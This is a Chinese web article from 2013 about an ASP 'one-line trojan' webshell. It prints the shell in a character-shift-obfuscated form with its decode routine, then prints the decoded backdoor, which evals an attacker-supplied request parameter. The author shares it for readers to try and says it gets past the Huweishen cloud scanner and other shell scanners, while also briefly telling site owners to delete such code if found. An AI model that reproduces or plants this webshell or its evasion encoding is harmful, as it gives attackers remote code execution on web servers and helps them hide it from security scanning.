一句话木马加密 过护卫神云查杀系统 过shell扫描器

  发布时间:2013-01-10 13:05:48   作者:佚名   我要评论
这个一句话木马最近被利用的很多,很多扫描工具扫描不到,不过一些asp版的扫描工具支持扫描eval和execute,如果发现如下代码,请删除,下面就是他们常发的木马后门

分享给大家 暂时未测试 大家自己用用看

大马的代码是简单加密了下的!很容易解开看见 是加密的一段代码


复制代码
代码如下:

<%
codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
execute (decode (codeds) )
Function DeCode (Coded)
On Error Resume Next
For i = 1 To Len (Coded)
Curchar = Mid (Coded, i, 1)
If Asc (Curchar) = 16 then
Curchar = chr (8)
Elseif Asc (Curchar) = 24 then
Curchar = chr (12)
Elseif Asc (Curchar) = 32 then
Curchar = chr (18)
Else
Curchar = chr (Asc (Curchar) -3)
End if
DeCode = Decode&Curchar
Next
End Function
response.write(decode(codeds))
%>

很简单的加密,解开一看

复制代码
代码如下:

<%
If request("xx") ="x" then eval request("hkmjj") end if
%>

经过测试,发现过目前的护卫神云查杀系统,这个貌似用的人挺多的

相关文章

最新评论